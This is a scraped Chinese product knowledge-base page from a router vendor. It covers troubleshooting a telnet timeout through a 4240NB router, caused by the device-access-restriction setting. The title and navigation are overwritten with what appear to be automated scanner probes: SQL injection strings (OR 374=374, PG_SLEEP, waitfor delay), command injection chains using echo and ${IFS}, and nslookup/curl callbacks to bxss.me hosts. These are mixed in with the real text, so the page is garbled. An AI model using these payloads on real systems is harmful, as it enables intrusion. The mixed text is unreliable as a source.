-1' OR 374=374 or 'mF5u9TGo'=' - 知识库文章-艾泰科技

产品中心

企业级路由器

echo vzcrma$()\ skxhiw\nz^xyu||a #' &echo vzcrma$()\ skxhiw\nz^xyu||a #|" &echo vzcrma$()\ skxhiw\nz^xyu||a #

&echo epttrz$()\ sbvgba\nz^xyu||a #' &echo epttrz$()\ sbvgba\nz^xyu||a #|" &echo epttrz$()\ sbvgba\nz^xyu||a #

lxbfYeaa&echo roixkv$()\ pqhifg\nz^xyu||a #' &echo roixkv$()\ pqhifg\nz^xyu||a #|" &echo roixkv$()\ pqhifg\nz^xyu||a #

|echo vaxfto$()\ bfpegd\nz^xyu||a #' |echo vaxfto$()\ bfpegd\nz^xyu||a #|" |echo vaxfto$()\ bfpegd\nz^xyu||a #

lxbfYeaa|echo xwnjui$()\ cfxjwx\nz^xyu||a #' |echo xwnjui$()\ cfxjwx\nz^xyu||a #|" |echo xwnjui$()\ cfxjwx\nz^xyu||a #

expr 9000750623 - 977544

(nslookup -q=cname hitxhxuagstyq35058.bxss.me||curl hitxhxuagstyq35058.bxss.me))

$(nslookup -q=cname hitspufvnrtis0220d.bxss.me||curl hitspufvnrtis0220d.bxss.me)

&nslookup -q=cname hitysfpkbnuke1e268.bxss.me&'\"`0&nslookup -q=cname hitysfpkbnuke1e268.bxss.me&`'

&(nslookup -q=cname hitriplecwmlj68c71.bxss.me||curl hitriplecwmlj68c71.bxss.me)&'\"`0&(nslookup -q=cname hitriplecwmlj68c71.bxss.me||curl hitriplecwmlj68c71.bxss.me)&`'

|(nslookup -q=cname hitqoizootwzud653e.bxss.me||curl hitqoizootwzud653e.bxss.me)

lxbfYeaa'&&sleep(27*1000)*rqcaap&&'

`(nslookup -q=cname hitmkjimoufyj09ec8.bxss.me||curl hitmkjimoufyj09ec8.bxss.me)`

;(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)|(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)&(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)

lxbfYeaa"&&sleep(27*1000)*sbpckp&&"

|(nslookup${IFS}-q${IFS}cname${IFS}hitclfiuqdslv37310.bxss.me||curl${IFS}hitclfiuqdslv37310.bxss.me)

lxbfYeaa'||sleep(27*1000)*yvlczf||'

&(nslookup${IFS}-q${IFS}cname${IFS}hitljbybigsfb143fe.bxss.me||curl${IFS}hitljbybigsfb143fe.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitljbybigsfb143fe.bxss.me||curl${IFS}hitljbybigsfb143fe.bxss.me)&`'

lxbfYeaa"||sleep(27*1000)*lqcltm||"

企业级无线路由器

lxbfYeaabuRDC5lu

lxbfYeaa' AND 2*3*8=6*8 AND 'uMxp'='uMxp

lxbfYeaa" AND 2*3*8=6*8 AND "ZJo6"="ZJo6

lxbfYeaa%' AND 2*3*8=6*8 AND 'z8Cx'!='z8Cx%

lxbfYeaahYG8jINu'; waitfor delay '0:0:15' --

lxbfYeaahpo5yDZB' OR 201=(SELECT 201 FROM PG_SLEEP(15))--

lxbfYeaaIYsp9IZ5') OR 930=(SELECT 930 FROM PG_SLEEP(15))--

lxbfYeaa8SuFVq1W')) OR 630=(SELECT 630 FROM PG_SLEEP(15))--

@@U4Q9C

lxbfYeaa'"()&%

lxbfYeaa'"()&%

'"()&%

'"()&%

lxbfYeaa9884590

lxbfYeaa9438988

lxbfYeaa'"()&%

'"()&%

lxbfYeaa9932083

1FBAOSFMA3G0

xfs.bxss.me

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'"

知识库与软件

-1' OR 374=374 or 'mF5u9TGo'='

文档编号:469
浏览:9528 评分:44
最后更新于:2009-09-07

用户环境：

从外网接入4240NB，WAN为200.200.201.8，LAN为192.168.16.1/24，4240NB下接一个三层交换机，其管理IP地址为192.168.16.10，用户想通过telnet 200.200.201.8登录4240NB以后，再telnet管理交换机，但telnet总是超时。

排错思路：

1、接在4240NB的LAN2下的PC是可以telnet三层交换机的，证明三层交换机端口已经打开。

2、在4240NB上可以ping通三层交换机，但是telnet不上。

3、接在4240NB的LAN2下的PC可以ping通4240NB，但是也不能telnet 4240NB。

解决方法：

在4240NB上 show run，发现启用了设备访问限制

在WEB界面查看如下：

取消启用设备访问限制，如下：

至此问题解决

分析：

1）设备访问限制开启后，就意味着这段地址仅仅可以访问我们设备的：web端口，telnet（23），以及DNS（53），DHCP（67，68）这些端口，以及ping路由器即icmp协议可以通过。

2）我们知道在使用电脑访问某个服务的时候源端口一般是1024以上的一个随机端口，类似在我们路由上去访问某些服务的时候使用的也是一个随机端口，而由第一点可以得出192.168.16.10是无法访问这个随机端口的，所以才出现了开篇所提出的问题。

解决方案
更多成功案例

关注艾泰

微博 · 企业版
微信 · 公众平台
艾泰艾网络APP

行业解决方案

案例解析

技术与支持

服务